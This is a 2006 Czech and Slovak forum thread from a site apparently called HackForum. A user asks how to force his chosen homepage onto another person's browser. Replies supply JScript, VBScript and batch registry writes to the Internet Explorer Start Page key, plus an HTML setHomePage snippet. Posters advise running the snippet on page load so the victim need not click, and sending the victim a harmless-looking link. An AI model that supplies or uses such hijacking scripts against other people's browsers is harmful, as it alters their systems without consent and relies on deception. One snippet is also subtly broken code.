domova stranka

HackForum

domova stranka#
da sa nejako zariadit aby sa v prehliadaci nejakej osoby nastavila domova stranka ktoru zadam ?
(odpovědět)
lojzo21.6.2006 17:57
re: domova stranka#
u Internet Exploreru ano, v registru - HKEY_CURRENT_USER\Software\Microsoft\Intern
et Explorer\Main a polozka Start Page (vsak se podivej)
U firefoxu ci cehokoliv jineho si nejsem jisty, zda to pujde .. i kdyby slo, bude potreba nejak rozkodovat a editovat conf soubor v local settings (hadam) .. tam by ses teoreticky mohl dostat pres promennou na jmeno prihlaseneho uzivatele (%username% tusim) - pokud by jsi to chtel dat do scriptu ..ale jinak nevim, nezkousel jsem :)
(odpovědět)
compman21.6.2006 18:07
re: domova stranka#
Mohla by mi nejaka dobra dusa napisat script na zmenu dom. stranky ? Alebo aspon poradit ako to mam spravit.

(odpovědět)
lojzo21.6.2006 18:22
RE:#
taky bych se přimluval za ten skriptik
(odpovědět)
gr0cz21.6.2006 19:48
re: domova stranka#
WshShell.RegWrite( klic, jmeno_soubor, "REG_SZ");
var klic = "HKCU\\Software\\Microsoft \\Internet Explorer\\Main\\Start Page";
var hodnota = "pozadovana stranka";
WshShell.RegWrite( klic, hodnota, "REG_SZ");

Toto ulož jako soubor s koncovkou .js
Nezkousel jsem to, takze nevim jestli ten klic, ktery zde byl doporucenej funguje.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP21.6.2006 20:44
re: domova stranka#
ja som nasiel na nete toto :

Dim Shell
Set Shell=Wscript.CreateObject("Wscript.shell")
Shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Inter
net Explorer\Main\Start Page","\\server\internet\index.htm"
Set shell=nothing


ulozis s koncovkou .vbs
(odpovědět)
Anti | E-mail | Website | ICQ 23858473621.6.2006 21:10
re: domova stranka#
Nebo donutit cil aby kliknul na webove strance na neco nasedujiciho:
<SPAN STYLE="cursor:hand" onClick="this.style.behavior='url(#default#
homepage)'; this.setHomePage('[link]');">Nastavit jako domovskou stránku.</SPAN>

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t21.6.2006 21:46
re: domova stranka#
Pouzij misto fce onClick onLoad a ani klikat nebude muset =)
(odpovědět)
Emkei | E-mail | Website | PGP21.6.2006 22:37
re: domova stranka#
Jn, vidis. Pak uz mu staci podstrcit hezkou url a je jasnej ;)

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t22.6.2006 13:15
re: domova stranka#
ja sem tu fci zmenil ale domovska stranka se mi nezmenila:(
(odpovědět)
gr0cz23.6.2006 18:34
re: domova stranka#
Protoze fce onLoad se prirazuje tagum body nebo img, ne spanu, musis si to samozrejme upravit...
(odpovědět)
Emkei | E-mail | Website | PGP23.6.2006 18:45
re:domova stranka#
j to mam
mam tam
<body onLoad="this.style.behavior='url(#default#h
omepage)';
this.setHomePage('[link]');" >kde mam chybu?
(odpovědět)
gr0cz23.6.2006 18:47
re: domova stranka#
nevim me to furt nejde:(
(odpovědět)
gr0cz24.6.2006 20:09
re: domova stranka#
potřeboval bych radu:když oetřu internet explorer tak mi místo seznam.cz naskočí securitynetpage.com a nevim co s tim...prosim o radu
(odpovědět)
Chorchec1.8.2006 12:14
re: domova stranka#
zmen si to v nastaveniach omG
(odpovědět)
jOe | E-mail | ICQ 284-848-2851.8.2006 12:19
re: domova stranka#
mna by zaujimalo preco mi tato davka neprepise registre:

@echo off
REG ADD HKCU\SOFTWARE\Microsoft\Internet Explorer\Main /v "Start Page" /d [link] /f

(odpovědět)
eFeX2.8.2006 12:01
re: domova stranka#
@reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d [link] /f > NUL
----
V ceste mas taky mezeru, takze nezapominej na uvozovky.
(odpovědět)
Emkei | E-mail | Website | PGP2.8.2006 19:00
re: domova stranka#
THX
(odpovědět)
eFeX2.8.2006 21:23

Zpět
 
 
 

 
BBCode